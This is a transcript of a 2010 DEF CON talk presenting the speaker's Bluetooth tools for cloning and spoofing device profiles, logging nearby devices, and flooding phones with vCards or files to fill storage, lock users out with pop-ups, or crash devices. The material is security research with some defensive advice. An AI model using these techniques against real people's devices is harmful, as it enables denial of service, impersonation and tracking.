 Alright, so I guess I'm ready to get started. Anybody who attended my presentation yesterday knows that we are off to a terrific start because the actual PowerPoint presentation has come up there, or the open office presentation. Yesterday I spent 10 minutes getting that done, so yes. Yay to not fail. Okay, so my presentation is Breaking Bluetooth by Being Board. My name is Ronan, and this is DEF CON 2010 slash 18. So the title comes from my research. I'm a graduate student. I'll talk about that in just a second. But the title comes from, I feel like my best ideas, hacking-wise, almost always come when I'm incredibly bored. So like, math class is awesome, long drives are great, airplane rides. I actually developed one of these tools last year on the flight to DEF CON because what are you going to do in there? So yeah, so that's the reason behind the title. About me, I'm a graduate student at Virginia Tech. My thesis is actually on Bluetooth security. So these are a couple of tools I've developed while doing my research, but it's a much broader scope of things. And my website where all this stuff is going to be posted is hackfromacave.com. I'm graduating soon, looking for a job. I had to do that plug. I'm sorry, shameless plug. So if this goes well, which already started off well, see me afterward. Moving on to the important stuff. Bluetooth, I'm going to give just a brief over. I'm sure most people here know if you're in this talk because you're interested in Bluetooth. But Bluetooth is a short-range technology. So Wi-Fi generates a lot of power. Bluetooth is supposed to be basically, they call it a cable replacement. It's low power, designed perfectly for smart phones or PDAs. It creates an ad hoc PicoNet. So while most of us end up preparing just two devices, you can actually pair more than that in the little PicoNet and have devices communicate with each other. But most of the time, you're pairing a headset to a single, like a smartphone or something like that. But it can do more. And it's a very highly-growing technology. The Bluetooth website, and this was a couple years ago actually, in I think 2006, posted that there are over one billion Bluetooth devices in the world right now, or Bluetooth-enabled devices. So that's a little bit of Bluetooth. Now we're going to the fun stuff. So part of how Bluetooth communicates is they have a Bluetooth profile. You're probably very familiar with it through the access point side of things. Wi-Fi access points have a very similar style, where you have a device address, which is the MAC address. You have a device class in this case, which describes what the device is. So it tells you if it's a phone or if it's a phone slash smartphone. It gives you a little bit of information about the device, and the device name can be anything you want it to be. So cloning that information is doable. And this isn't something that I created. This has been, you know, done years in the past. But all you have to do is, you know, the first two, the class, and the name, easy to do. The other one, the device address, you have to have some certain chipsets. The CSR chipsets are great. You scan for a device, you get it. You can clone it. Or you could change your profile. It's the same as, like, MaxBoofing. So if you ever do MaxBoofing, you do the same thing where you generate a new Bluetooth profile. And now you've obfuscated who you are or what your device is. So previously the method for doing this was just manual. I mean, so you'd have to scan for a device. You'd have to manually change settings. So I created Spoof Toof as a way to automatically do a lot of these things. And it does a little bit more. So it's great for obfuscation. Or impersonations. You can actually pretend to be somebody else. Or something I didn't really intend when I wrote it was actually to observe devices in range and actually log that. So I'm going to go through a couple of different modes that Spoof Toof has right now. The first one is a basic scan. So what it's doing is it's using the dash i. The HCI0 is like a WLAN for everybody who's Linuxy and does ifconfig. This is HCIconfig and it's got the same kind of thing. So that's the interface. And it's scanning and dumping it to the log. So basically just scanning the local area and dumping everything to the log. I should have mentioned this before. I forgot to. Bluetooth has two modes, discoverable and nondiscoverable mode. It will function in both. And this is the key for securing it. You want to have it in nondiscoverable mode. The only reason to have it in discoverable is for initial pairing. So you want the two devices to connect. And once they know about each other, they have the information. They don't need to scan for each other after that. So then you turn the device into nondiscoverable. So this only finds devices in discoverable mode. It's not like you might be familiar with the tool Red Fang, if you're a big Bluetooth hacker, which tries to find devices that are in nondiscoverable mode. This is only for discoverable mode devices. Okay, so moving on to mode two. Mode two is actually just a randomly generated profile. So you really want to obfuscate and you don't want to actually have to think about anything. You just type the dash R flag and it creates you an entirely new profile for your device. An Easter egg that I didn't actually put in the documentation, kind of on purpose, because I wanted to release something at DEF CON. If you change from the dash lowercase R to dash uppercase R, I have a list of all kinds of science fiction names instead of normal names. The previous one took the top 100 first and last names and generates it from that. This will take your favorite science fiction characters, so you can be Yoda's phone or Malcolm Reynolds peripheral or Bender Bending Rodriguez's audio video device. So now you know. Mode three. Oh, this mode is where you actually get to specify the information you want to change your device information to. So this is a little more of the manual side of things. So new name, the device address, and the device class. Not all. You can't just put anything for the device class. I mean, you could and it'll just say unknown. So if you're going to put something in there, you know a little bit how the device class works, which I'm not going to really go into too much today. Mode four is, oh, it's a load, previously a log scan. So if you want to scan, save for later, log it in, make one of the selections and then clone that device later on. You can do that. And the last one is the incognito mode. You can have a spoof tooth randomly generate a profile every X number of seconds. So if you don't want to be seen, you can keep changing your profile. This will mess up persistent connections. So don't think you're going to be connected to something and keep changing that. It will mess it up. But if you're just running these scans or whatever, it will change your information every 10 seconds. So this is what the interface looks like. Pretty straightforward. It will run the scan, especially the device that pops up with this menu. It'll list all the devices there. I'm not that great with the interface programming so far. So instead of having nice little, it's similar to how Kismet, the menu interface is for Kismet, except I know a lot less. So instead of having nice little arrows and stuff, you have to type in characters. So sorry about that. Maybe in a future version, it will be a little more slicker interface. So yeah, that's showing you four of the scans. You can see there's a couple pages at the bottom. So you just previous, next, and it will show the rest of the scans, which I have obfuscated people's names and the addresses in this slide. But we'll show you real quick a live demo of who's in this room. All right. Can you guys hear me clicking? Is that really loud out there? It sounds really loud up here. Okay. This is actually, I don't know if it's going to pick up, it might pick up stuff up here, because actually I'm not hooking it up to a long range device. So Bluetooth has three different classes. Yeah, okay. Popped up, done. One thing to note, so I'll go for the class first. The class of devices, there's three different ones, one meter, 10 meter, 100 meter. Those are somewhat accurate numbers. So if you're looking to do anything with Bluetooth, you want to get a class one, because that's the longer range. So Bluetooth scanning for this, you see that the, actually no, all these got their names. Sometimes the scans, they have an initial scan and then a follow-up. So you can see under, I think it's four. Yeah, device four, it says unknown. What? Oh. Yeah, sorry, that's going to, is that a little better? I know it's all blur and it's hard to see. I mean it's not, it's going to mess up the menu if I do it any bigger, so sorry about that. You can kind of see it's mostly a blur. But if you notice, is it gone now? It was. Number four, change, the name changed from unknown to red team. Man, I'm getting a lot of stuff in here. I figured there'd be more paranoid people. It doesn't pick it up very far. So the device, the scanning for Bluetooth, the initial scan detects the device based on the MAC address and then does a follow-up scan for the name. So some of the times if you're, you know, if you're using this to do something like war driving, you will need to be in an area where you're actually going to have a persistent amount of time with the device that you're scanning. You can, if you want to capture that information because it takes 10 seconds to a minute to complete a scan. The initial scan is actually very, very quick, but the follow-up scan for the name takes a long time. So if you notice that things change on there or that you're not getting the name, that's the reason why. So it's just, this only works with discoverable devices. Sorry, he asked if it was just with discoverable devices. This only works with discoverable devices. Through this, I've actually started another project called the Bluetooth Profiling Project. It's similar to a family with Josh Wright. He's doing a very similar project and collecting a lot more information on specific devices. I'm only looking at a little bit. So what this project is, it's trying to map the MAC address range of Bluetooth devices. So for those who aren't familiar, each type of device, every manufacturer gets their own, I thought I had in the slide, forget exactly what it's called. It's basically the first six characters in the MAC address are manufacturer specific and then the rest of them are randomly given to the devices. So if you can figure out, and that range is the same on all devices of a particular type. So if you can get the range of those by you keep scanning and you find that whatever type of phone and you see, oh, well there's a pattern here. I see that all these types of phones have between this and this. Then you can use something else to, oh, it will help out with other projects. Actually, I'll talk about that in just a minute. So right now I've collected about 1,500 devices, which is surprising. It really is surprising how many devices are out there in discover mode because they really shouldn't be. I listed about 1,000 of them on my website right now. I'll try to get more. Yeah, so actually I just went into this a little bit more than on the previous slide. So yeah, using Red Fang, as I mentioned, Red Fang finds devices in non-discoverable mode by attempting connections essentially. So it has to run through the entire list and it takes forever. Like you couldn't actually run the whole gambit and I don't know what the number is, I don't want to quote it, but it's years and years and years and years. So this will help narrow that down. If a device, if only 1,000 models of a certain device are made and you can get that range, well then you have a lot higher than whatever the MAC range, the possibility of MAC ranges is. The other thing is to match the model with the address. Yeah, let's talk about a little more of the research. A big part of it that I've discovered is actually the disclosure of sensitive information. I feel like a lot of people don't realize what's being disclosed by the name of their Bluetooth enabled device. Oh, sorry. Yeah. So we went through this just a minute ago. That's the OUI. That was the number I was looking for. This is the sensitive one. So a lot of them are giving out things like the first name, the nickname, location, device model. I've seen things like URLs actually in the name because people name the computer the same name as its URL. So then you can see it that way. All kinds of stuff that, you know, I'm sure they don't know that that's the name of it or that anybody walking by can just get the information. But my findings are about 30% of Bluetooth devices that I scan gave away an individual's first name. And that's just me just getting through them. I might not recognize a name off the bat, but that's roughly it. About 20% give out last names, locations. The device model, I considered that sensitive information only for exploitation purposes. So if you know what the device is, then you can target your attacks. So that's, you know, but I understand naming it that way. I'm not saying don't name the device whatever, but it is possibly sensitive information if people are going to try to exploit a particular device. You change the name to something else. Other than, as I said, the MAC range figuring out that way, it makes it very difficult to determine what the device is right off the bat. Contributing. I'd love to have an enormous list of profiles. The more that people contribute, the better, the better, the more accurate things will be. There's a couple caveats to that. So I wanted the name, the address in the class. No more or less. I don't care where you got it. I don't care how you got it. Just as long as you post those three things. I want to sanitize the information. It is publicly available information, so there should be no problem with it. But just to be nice. Sanitizing things like the name. Anything that looks like a name. Replace it. The place information or other is for the category that if you're like, this is kind of, this might be sensitive. I wonder if I could ask him. Just replace it with other. It's not that important to have the name for everything except for, as I said, the statistics earlier. That's the most of the reason I don't just replace the name right off the bat. It could help with some other research down the road. So I've created a forum on my website where people can just post the logs that they find. And I will update the full list as I get more posts. So here's my nice little DEF CON list. I thought this would bring point the home. I just phrased that completely wrong. So this is just a couple of them. I've been scanning all of DEF CON. Congratulations. People do actually do hacking stuff at DEF CON. And if you thought you would turn off your Bluetooth device, I see some people in the audience right now that are like, yeah, wait, I think my phone's booted this off. But, yeah, I don't know how many clients didn't get a list. I'm going to go with about 250 different profiles that I found here. When I wasn't even, this wasn't like an effort I made. I didn't try to get every room or go all around. It's mostly been sitting in the Hackers or Charity booth. So if you went to the vendor area, you probably got scanned there or walking around a little bit. So this is just a couple of them. I liked Fail Phone, clever naming. I removed the star, star, star, is actually people's real names. And you can see what devices give those out. This is, yeah, as I said, just a couple. So be aware that whatever you name it, if you don't know what you've named it, you're probably giving something out. I mean, if it, you know, if you rename it to Fail Phone, then, okay, well, obviously you took the upgrade and you know what's going to be named. If you don't know what it's named, you might want to check that out. And I meant to say this list was inspired by the Wall of Sheep guys. So I'm going to be posting some of this stuff with them later on. So this is a short list. If you want to see that you were scanned, you might be going to check out the Wall of Sheep a little later. So that's the obfuscation side. That's the, you know, data collection and everything like that. Now we'll get into the offensive side of things. So a vCard. So this is one of the tools that I've been working on called vCard Blaster. A vCard is a virtual business card, essentially. You probably have used them before. A lot of places have them for download or information on people. It works, syncs up with like Outlook. It creates the profile. It's good for your contact list. And it's heavily used in Bluetooth. A lot of the Bluetooth-enabled phones will be able to share things over vCards, which makes things a lot easier instead of all the business cards going around. You just sync up your devices, send it over, and life is good. But some of them that allow it, sometimes it'll come up with a prompt that says, you know, would you like to allow this vCard? And you're like, oh, yeah, sure. I just met that guy. You know, we need to pair before you can send that over. Some of them, however, don't do that for this particular feature. And I can understand why in the development of it they decided, oh, well, obviously, if you're just going to send a vCard over, there's nothing bad about it. But there could be. What vCard Blaster does is it allows you to send a constant stream of vCards to a particular device or to all devices in range. One, a couple of different things. Let's see, yeah. A couple of different things this can do. One is potentially fill up the disk drive. vCards, while they can just contain email or your name or your phone number, they can actually contain a lot more than that, like images. So if you could send a constant stream of vCards with very large file types, you could potentially fill up the disk of something that's a very small PDA with a very low amount of memory or if it's partitioned memory. The other thing is you can add contacts to people's devices. So that could be interesting just to see what you want to add. The other thing is, actually, if you want to add a ton of random names in there, you've officially made it very hard for them to make a phone call because if the contact list had 100 people and now it's got 10,000 people in it, they're never going to find mom, mom, mom, mom, where is it down there? And I don't know of any quick way to remove new contacts most of the time. I'm pretty sure it's a manual process. So unless they have some sort of backup of their contact list, they have to go in and manually remove all of it. Something I'm going to be working on is actually the random name generation. So that's not in there right now, but I'm going to be adding that so it will randomly generate a name. You can't have the same name but a lot of times they'll get angry about that and say, are you sure you want to replace this? And you don't want to make the user aware that this attack is going on. So it randomly generates and doesn't double up on the name so you can fill it up that way and they look like legitimate ones because right now I just have a random character of string so they can pretty much tell that it's not legit. So this is what the attack looks like. I can demo it... I can demo one, sorry, it's dead. But this is exactly what it would look like. So the flag's up there. Can you guys? You can't really see it that well. So I'll describe what it is. It has a jasg flag for generating a dash i20 to say run it 20 times instead of 10,000 times. The dash t, it has to do with the threading to see if it times out. So it'll continue to work so it'll freeze up. So you want to add a time out option in there. And then just the director, you can either select a specific vCard or vCard Blaster will generate one for you and then send that information on. So that's pretty much what's going on here. I have a string that I gave it, big brother, and it's randomly generating text after that so that it won't prompt the user to replace the current contact. So this one, I wish I could show how quick it runs. And once that they initially connect, it's milliseconds to copy these over. So you can fill up a contact list pretty darn quick. Yeah, the live demo thing, not going to happen. Blooper is actually a very similar type of program. It's exactly the same, except for it's not vCards, it's any type of other file. So the process for sending these files is the same. However, when it gets on the PDA side, they know that vCards are supposed to be interpreted this way and possibly other files are interpreted in certain other ways, and then the rest of them are for download. So it's basically the same principle except... Not to single you out or anything. I'll just hold on here. Yeah, so it's the same principle, but it has a different kind of denial of service. Well, I guess it's similar as the first one I mentioned. So what it does is I found on specific devices, actually this specific device, that what happened is normally when you just want to transfer a file, and some of you might have done this through Bluetooth before, you either need to make a connection, it says somebody wants to connect, and then you connect, and then it says, okay, now I want to transfer a file, or it says Bob is transferring a file to you, do you accept? When you click accept, it starts downloading it. I found on a particular device it would cache the file, and then prompt the user for the download. I don't know where it would cache, because forensics on PDAs is very difficult, and I haven't actually found how it caches it or where it caches it, but it caches it nonetheless, and that's before it prompts the user that the interaction is going on. That's assuming a couple of things, like it allows anonymous connections. So this is only one specific device that I've tested it on. It might work on a lot of others, and people don't like to give me their phones anymore for some reason. So what you can do is, as I mentioned before, you can fill up a disk of a device with a low disk space, and this one works a lot better, because the vCard one, you might have 20 lines of text you're sending. This one you can actually generate a file of whatever size you want and send that. So you can send a specific file if you want, which is fine by me, but I thought I would just offer to randomly generate a file, because what's important here isn't the file, it's that it's causing it to fill up the disk space. So you can generate a file of 10 kilobytes or, you know, 5 gig, if you really wanted to. Of course, 5 gig over Bluetooth would take forever and ever and ever. Bluetooth is not designed for heavy use. You don't want to pass an ISO over Bluetooth. That generally will not go very well. It's a very low data rate compared to Wi-Fi. It's 2 megabits slash 3-ish megabits and that's, you know, like theoretical Mac stuff. So it does take a while. That's the one caveat of this thing, of this attack is you really have to be next to somebody for a very, very long time. This isn't going to be very effective at a coffee shop. If you're going to be performing this attack, it's got to be a device that's for an extended period of time, hours, maybe a day depending on how much this space there is and if the attack is effective. Oh, yeah. I put the, it can cause it to crash. So when I was testing this, once I accidentally hit OK, I sent a bunch of files at once. You can send one file or a lot of files. However, if you want to test it with the device to see what's more effective. So I started, you know, caching the files and then it says, you know, do you want to reject them? Do you want to say OK for this file or do you want to download them all? And I just happened to actually accidentally click accept all. And so long story short, it took what was in this memory which was almost full and it tried to write it over into the real file system. So we completely ran out of disk space. And I don't know if it ran into the memory because a lot of these devices actually, you know, they're hard drive space and they're RAM are actually, you know, the same actual physical chip or flash or something like that. So what happened is it actually completely fried the device and I had to do a factory reset. Which was fun. It took me forever to figure out what was going on and it died. And then bringing it back up, it would not boot. It would not boot. So I actually had to do the manual factory reset to get that to work. So that's a nice little attack when you completely break the system into the manual factory reset. So this is what it looks like. I can attempt the demo over here. Yeah. Actually, I'll do the demo and then come back to see what this looks like. So to scan for a Bluetooth device in Linux, HCI tool, scan. You could use Spoof Toof. This is just quick and easy. The advantage over just running a script that will do this is that Spoof Toof only logs it once. So if you're doing a... Thank you. Thank you, whoever out there. It's hard to see. It says Ronin's mum. Fanboy. Thank you. Okay. So I'm sure people have been pounding on this thing because it's a Bluetooth app and I enabled Bluetooth on this. So we're going to try to run this. Let's see. Wow. So. Sorry. Let's see if I can boost this up a little bit. That didn't do anything. It's a little better. One more. Yeah, okay. So that's the command I'm going to run against my Dell AXM up here. And should have just copied and pasted that like I just did. What would have been faster? Oh. I should... I need... I'm actually trying to upload a file that doesn't exist. Evil file. Wait. That's not good. Okay. Well that didn't work at all. I don't know. I know why I haven't updated this system. I apologize for that. But the attack would have looked exactly like this. So that's actually the system's fault. The program should work fine. I guess I should mention that a lot of these are actually generating a script internally. So that's why actually that failed, because I didn't include some of the code. I actually just end up bundling into a script. The new versions that I'm working on right now will have everything in it. So you don't have to install some of these tools, some of these additional packages. And that's the reason that failed right now. But anyway, so what I have here that's hard to see is it's going through five iterations and it's using a file generating of size 10,000. And you can select the file name, the current file name, and you can... And then you can tell it what the file name should be on the other end. So it doesn't have to be the same. So you just have to say that this is some sort of whatever file, maybe someone would accept it actually or something that looks nonchalant. And then target the device and you can kind of see the iterations. Each of it finds the device. It's sending the file and then it's done. But it does take quite a while for a size. This probably took 10 minutes to send the size of 10,000 K. So, yeah, it will take a little bit of time. And then on the other end, you can kind of see it has a little pop-up. That pop-up, you can either... So save all in the bottom right left. That's what I clicked in. That was the downfall of the device. Imagine a user would probably notice if I send a file that says evil file. It generates a counter too. You have that option so the files can look differently and that's how I knew how many were up there if you're testing. It makes it a lot easier because another sort of denial of service in this kind of falls into both of them. Pop-up menu, denial of service. If you're sending a constant stream of files that are very small, this is another option, and they click no and it pops right back up. So unless they get away from you, they can't actually disable Bluetooth unless there's some hardware setting because they can't get the start menu because they click start menu and that pop-up is a higher priority than the start menu. So all you do and this happened to me and I was like, no, stop. Crap, I can't go over the other side because it kept popping up and I couldn't actually do anything on the device because of the pop-up menus. So if you really want to annoy somebody, that's a good way to do it. Another tool I've been working on is a PoneTooth. This is an attack suite, essentially. I've tried to bundle together some common Bluetooth attacks other than the ones I mentioned here. None of these are mine, but I figured I'd make a little bit of an easier way for certain people to do pen testing. There's a really good actual suite in Backtrack that's... If you're a first-time user, you want to go that route. It steps you through things. Mine does not do a step-through. What this is is it basically allows you to run a script and it will scan for everything and only run the attacks once against it. So it's a binary file, but it could have been a script file, but it only runs the attack list once. You provide the list of attacks through the tools. So there's no point in click or anything, or you're not just selection. You make this config file whatever you want, and you run those attacks against the devices. You can say one specific device, you can say all devices in range, and it'll run all those against it at a time. I don't do any report generation. I probably won't do any report generation maybe, possibly, but all you get is the output of the actual attack. It's not going to provide the information that says this succeeded, this failed, whatever. But it's mostly there to make... I worked on a project where I had to run a lot of attacks... Excuse me, I had to run attacks a lot of times against a device, and then I have to type in the Mac every time, and it got to be a little bit of a pain. So this is more just the automatic way to do things. So here's the config file. The configuration file uses a star and inserts the MAC address. So a lot of them will tell you this is where the MAC address should be when you're running the command. That's basically all it really does, other than it could just be a bash script except for that it scans and only runs at once. This is the default area where the file is installed. And it will... You can run it multiple times through, so you can say I want to actually run this script as many times as you want, and that's just an example of this specific log file that you want to log the information out to and the scanning it 10 times. So you can specify a different configuration file if you want, but this just makes your life a little bit easier if you're going to be running lots of attacks against a single device or in an area of devices. If you're going to be pen testing at your business and you want to see what vulnerability is out there and you're walking around with it, this might help you out a little bit. An example. So Pound is to keep it from being read in. So the list comes with examples. It's got some default ones. And I tried to put some in there, some of the commands, because I know some of these tools, while awesome, are not as, you know, widely used. So there's not a whole lot of documentation and examples of things. So I tried to include examples of how to use them in a way that I would normally use them. So that should help you out if you are new to this in getting started. So I've provided a couple of examples. You can add whatever you want, as long as you use the wildcard, it'll insert the address in there and run whatever you want. Here's a couple of project pages for the different things. And I'm up for Q&A. So anybody? It's something I started years ago. I just decided to put it up there and then ever since, every presentation I do has a bunny. So, yeah. We have any questions? Do you know what time it is? Not good. Any questions? Nobody cares? All right. The problem with the, you have to find it when it's nondiscoverable and that's a big pain. There is actually some presentations. I think they did a great job. I'm using a USSRP to monitor the bandwidth, the frequencies, and getting it that way. But that's frequency analysis. So you can discover devices there and you might be able to pull out the MAC and it's very complicated and long. But Red Fang is a great option to find nondiscoverable devices, but it takes so long, it's not terribly practical. Yeah, actually we've got some swag here. If anybody wants it, you can come on up and throw some too. Will people want this stuff? All right. I'm going to see how far I can get out. Almost to the back. Deflected. All right. I'm going to be in room 114 if you have questions about that or maybe about this.